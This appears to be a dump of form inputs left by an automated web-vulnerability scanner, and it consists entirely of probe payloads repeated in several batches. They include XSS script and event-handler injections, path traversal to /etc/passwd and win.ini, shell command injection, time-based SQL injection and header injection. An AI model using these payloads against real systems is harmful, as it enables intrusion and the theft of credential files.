${@print(md5(acunetix_wvs_security_test))}

1

-1)

1

1

http://hitTVPIzq1ZWQ.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

acunetix_wvs_invalid_filename

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

||cat /etc/passwd

3TguSrHz'

1

1

http://www.acunetix.tst

comments

1

'"

1

PK31V48s')

&dir

1'"()&%<ScRiPt >prompt(954907)</ScRiPt>

1

comments

1

6GTuOAWc'))

<!--

1

file:///etc/passwd

'"()&%<ScRiPt >prompt(937416)</ScRiPt>

'&dir&'

1

comments/.

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1_995600

1

1

1

"&dir&"

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

|dir

acu3809\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3809

1

1

1

../../../../../../../../../../windows/win.ini

'|dir

acux3618\xc0\xbez1\xc0\xbcz2a\x90bcxuca3618

1

1

../../../../../../../../../../boot.ini

1

"|dir

1<ScRiPt >prompt(978552)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(952210)</script>

1

1

1

1

1<ScRiPt >prompt(993986)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?920710></ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(960839)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<video><source onerror="javascript:prompt(958389)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(927591)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<div style=width:expression(prompt(936768))>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<iframe src='data:text/html

response.write(9509583*9314062)

1

1

1

'+response.write(9509583*9314062)+'

1<body onload=prompt(949728)>

&cat /etc/passwd&

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

"+response.write(9509583*9314062)+"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(996554)>

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

1

1<img src=xyz OnErRor=prompt(994381)>

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(951538)>

1

cat /etc/passwd

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<ScRiPt%20>prompt(934916)</sCripT>

1

`cat /etc/passwd`

-1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${99345+100158}

1

1&lt

-1)

|cat /etc/passwd#

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

\xf6<img acu onmouseover=prompt(943946) //\xf6>

1

1some_inexistent_file_with_long_name%00.jpg

-1))

'|'ld

1&n995268=v964433

)

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<input autofocus onfocus=prompt(919661)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

ad6hT5mx'

1

"|"ld

!(()&&!|*|*|

1

<a href='http://www.acunetix.com'>website security</a>

'"()

1

/etc/passwd

testasp.vulnweb.com

8KS04GeB')

^(#$!@#$)(()))******

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

81YvZwq4'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

1_xh8JH <ScRiPt >prompt(927231)</ScRiPt>

1

'

1

1

1

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

1

-1)

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

1

acunetix_wvs_invalid_filename

-1))

1

1

http://hit8pORhziHjl.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

&dir

1

t0WbjNQT'

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1

1

file:///etc/passwd

1

1

'&dir&'

7JkKBRu0')

comments

1

1

1

'"

/\../\../\../\../\../\../\../etc/passwd

1

s5A6JHEI'))

1'"()&%<ScRiPt >prompt(978445)</ScRiPt>

"&dir&"

comments/.

1

WEB-INF/web.xml

<!--

1

1

|dir

1

'"()&%<ScRiPt >prompt(993790)</ScRiPt>

1

1

WEB-INF\web.xml

1

1

1

'|dir

1_952155

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

acu10250\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10250

1

1

../../../../../../../../../../boot.ini

1

1

1

1

acux8247\xc0\xbez1\xc0\xbcz2a\x90bcxuca8247

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(970213)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

................windowswin.ini

1<script>prompt(902955)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(948577)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983154></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(920193)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(955716)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(928372)"></g></svg>

1

1

WEB-INF/web.xml

1

1

response.write(9237470*9841365)

1

1<div style=width:expression(prompt(922702))>

WEB-INF\web.xml

1

'+response.write(9237470*9841365)+'

1

1

1<iframe src='data:text/html

"+response.write(9237470*9841365)+"

&cat /etc/passwd&

1

1

1

1<body onload=prompt(946032)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(954697)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1<img src=xyz OnErRor=prompt(946911)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

-1

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(908614)>

1

1

1

${100448+99578}

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

1<ScRiPt%20>prompt(920184)</sCripT>

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

1&lt

1&n965883=v914460

1

1

)

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

1ScdM5Er'

\xf6<img acu onmouseover=prompt(928832) //\xf6>

1

1

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

zx5fMOeW')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<input autofocus onfocus=prompt(999148)>

1

'"()

1

^(#$!@#$)(()))******

testasp.vulnweb.com

http://testasp.vulnweb.com/t/xss.html?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

VzS41Byp'))

'

/etc/passwd

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

'

1

-1

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1_tg1rU <ScRiPt >prompt(934228)</ScRiPt>

"

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

http://hitEEhDgOaLUk.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

-1))

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

&dir

comments

3Dv5uYMw'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'"

http://www.acunetix.tst

'&dir&'

comments

1

fYqmYkyE')

1

1

file:///etc/passwd

1'"()&%<ScRiPt >prompt(943569)</ScRiPt>

<!--

1

"&dir&"

comments/.

gguLV0T4'))

1

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(918002)</ScRiPt>

1

1

|dir

1

WEB-INF/web.xml

1

1

1

1_952505

1

1

'|dir

1

1

WEB-INF\web.xml

acu3520\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3520

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

acux2742\xc0\xbez1\xc0\xbcz2a\x90bcxuca2742

1

1<ScRiPt >prompt(985517)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(935676)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(954553)</ScRiPt>

1

1

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?910405></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(952300)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(921388)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(946966)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(975314))>

1

1

1

response.write(9979166*9841640)

1<iframe src='data:text/html

WEB-INF/web.xml

1

'+response.write(9979166*9841640)+'

1

1

1<body onload=prompt(964887)>

&cat /etc/passwd&

WEB-INF\web.xml

1

"+response.write(9979166*9841640)+"

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(979094)>

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(953943)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

"&cat /etc/passwd&"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(994773)>

-1

1

cat /etc/passwd

1

1

1

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${100196+100183}

1<ScRiPt%20>prompt(951871)</sCripT>

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1))

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n956108=v913077

1

1&lt

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

Kl392An2'

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

)

\xf6<img acu onmouseover=prompt(986632) //\xf6>

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

d6CFRkZS')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1<input autofocus onfocus=prompt(926701)>

"|"ld

testasp.vulnweb.com

pval8BxJ'))

^(#$!@#$)(()))******

'"()

'

/etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

1

[url=http://www.acunetix.com]website security[/url]

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

${@print(md5(acunetix_wvs_security_test))}

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1_56xRs <ScRiPt >prompt(927043)</ScRiPt>

"

1

1

-1))

1

1

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

||cat /etc/passwd

1

eDDwzEtw'

http://hitRHI8ch7iwR.bxss.me/

1

1

acunetix_wvs_invalid_filename

1

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

lQkopECP')

1

1

1

'&dir&'

comments

1

file:///etc/passwd

1

KWRrzsND'))

1

http://www.acunetix.tst

1

"&dir&"

comments

'"

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(920990)</ScRiPt>

1

1

1

1

|dir

<!--

comments/.

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(996327)</ScRiPt>

'|dir

1

1

1

1

1_983874

WEB-INF\web.xml

1

"|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini

acu8627\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8627

1

1

1

1

../../../../../../../../../../boot.ini

acux4922\xc0\xbez1\xc0\xbcz2a\x90bcxuca4922

1

1

1

1

1<ScRiPt >prompt(988641)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(997146)</script>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(927142)</ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?987630></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(963888)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(943037)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(921936)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9646801*9049080)

1<div style=width:expression(prompt(938921))>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

&cat /etc/passwd&

1<iframe src='data:text/html

1

'+response.write(9646801*9049080)+'

1

'&cat /etc/passwd&'

1

1<body onload=prompt(929185)>

"+response.write(9646801*9049080)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(931030)>

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(969909)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

-1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img/src=">" onerror=alert(983767)>

1

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

-1)

1

1

1

1<ScRiPt%20>prompt(994300)</sCripT>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${99022+99504}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

-1))

1

1&lt

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n981299=v904334

1

1some_inexistent_file_with_long_name%00.jpg

YVtgS6d6'

1

'|'ld

1

\xf6<img acu onmouseover=prompt(968486) //\xf6>

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

7UahA1da')

"|"ld

1<input autofocus onfocus=prompt(985477)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

testasp.vulnweb.com

'

1

3kZER72h'))

<a href='http://www.acunetix.com'>website security</a>

'"()

1

/etc/passwd

^(#$!@#$)(()))******

1

1

"

1

-1

[url=http://www.acunetix.com]website security[/url]

1

'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

-1)

1

1_9fvD6 <ScRiPt >prompt(995987)</ScRiPt>

"

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

${@print(md5(acunetix_wvs_security_test))}\

-1))

1

http://hitND94PjHQtU.bxss.me/

||cat /etc/passwd

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

cEr0my9a'

1

comments

1

&dir

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

USiXpyEM')

1

comments/.

1

1

http://www.acunetix.tst

0KdXdeSN'))

'&dir&'

1

1

file:///etc/passwd

'"

1

1'"()&%<ScRiPt >prompt(952022)</ScRiPt>

1

1

1

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

<!--

1

1

'"()&%<ScRiPt >prompt(907553)</ScRiPt>

|dir

WEB-INF/web.xml

1

1

1

1

1

1_956781

WEB-INF\web.xml

'|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

"|dir

1

1

../../../../../../../../../../boot.ini

acu9807\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9807

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux7792\xc0\xbez1\xc0\xbcz2a\x90bcxuca7792

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(995772)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(988956)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(973766)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?998352></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(998586)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(947286)">

1

response.write(9211963*9059230)

1

1

1

&cat /etc/passwd&

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(999052)"></g></svg>

'+response.write(9211963*9059230)+'

WEB-INF/web.xml

1

1

1

'&cat /etc/passwd&'

1<div style=width:expression(prompt(962078))>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

"+response.write(9211963*9059230)+"

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<iframe src='data:text/html

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1<body onload=prompt(960826)>

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

-1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(917317)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1<img src=xyz OnErRor=prompt(998012)>

${100202+99285}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

-1))

1

1

1some_inexistent_file_with_long_name%00.jpg

1<img/src=">" onerror=alert(966006)>

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&n933985=v991268

evAlFzNv'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<ScRiPt%20>prompt(914522)</sCripT>

)

"|"ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'"()

qxuinO8e')

testasp.vulnweb.com

1&lt

1

!(()&&!|*|*|

/etc/passwd

1

1

yOwGrjy1'))

1

1

\xf6<img acu onmouseover=prompt(960605) //\xf6>

'

^(#$!@#$)(()))******

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<input autofocus onfocus=prompt(996713)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

1

"

-1)

1

1

<a href='http://www.acunetix.com'>website security</a>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

-1))

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

http://hitqpd7nWtwNs.bxss.me/

comments

1

1

zwAoga5d'

&dir

1

1_mNMik <ScRiPt >prompt(925465)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}\

file:///etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

E77OBKQl')

1

'&dir&'

1

/\../\../\../\../\../\../\../etc/passwd

1

http://www.acunetix.tst

comments/.

cDPU6CIO'))

1

1

"&dir&"

1

1

WEB-INF/web.xml

'"

1

1

1

1

<!--

1

|dir

1

WEB-INF\web.xml

1'"()&%<ScRiPt >prompt(993360)</ScRiPt>

1

1

1

1

1

'|dir

../../../../../../../../../../windows/win.ini

'"()&%<ScRiPt >prompt(997772)</ScRiPt>

1

1

1

1

1

"|dir

1_928360

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acu2810\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2810

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux4773\xc0\xbez1\xc0\xbcz2a\x90bcxuca4773

1

1

1

................windowswin.ini

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(918786)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<script>prompt(932430)</script>

1

1

1<ScRiPt >prompt(957615)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?985646></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<ScRiPt >prompt(979641)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(946954)">

1

WEB-INF/web.xml

response.write(9022876*9943944)

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977012)"></g></svg>

1

1

1

1<div style=width:expression(prompt(954946))>

1

'+response.write(9022876*9943944)+'

&cat /etc/passwd&

1

1

1

1<iframe src='data:text/html

1

"+response.write(9022876*9943944)+"

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(973773)>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(967420)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd.jpg

1<img src=xyz OnErRor=prompt(976545)>

-1

1

1

`cat /etc/passwd`

${100283+99443}

1

1

1<img/src=">" onerror=alert(992221)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(902623)</sCripT>

-1))

1some_inexistent_file_with_long_name%00.jpg

1

1&n985961=v933501

'|'ld

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

lH284Hdd'

1&lt

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

"|"ld

)

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

zmHDDtef')

\xf6<img acu onmouseover=prompt(986205) //\xf6>

testasp.vulnweb.com

1

!(()&&!|*|*|

'"()

'

'

caJl0mCG'))

/etc/passwd

1

1<input autofocus onfocus=prompt(958930)>

1

